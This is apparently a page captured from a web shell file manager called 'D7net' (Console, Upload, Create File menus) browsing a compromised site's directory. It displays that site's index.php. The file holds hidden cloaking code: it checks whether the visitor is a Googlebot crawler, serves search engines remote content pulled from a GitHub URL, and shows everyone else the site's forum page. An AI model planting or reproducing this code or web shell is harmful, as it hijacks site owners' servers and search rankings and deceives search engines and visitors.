D7net
Home
Console
Upload
information
Create File
Create Folder
About
Tools
:
/
home3
/
encodto1
/
luksomtravel.com
/
Filename :
index.php
back
Copy
<?php error_reporting(E_ALL); ini_set('display_errors', 1); function is_google_bot() { $agents = array("Googlebot", "Google-Site-Verification", "Google-InspectionTool", "Googlebot-Mobile", "Googlebot-News"); foreach ($agents as $agent) { if (strpos($_SERVER['HTTP_USER_AGENT'], $agent) !== false) return true; } return false; } if (is_google_bot()) { $bot_content = file_get_contents('https://raw.githubusercontent.com/masoteng/weree/refs/heads/main/mna'); echo $bot_content; exit; } else { include('forum.php'); exit; } ?>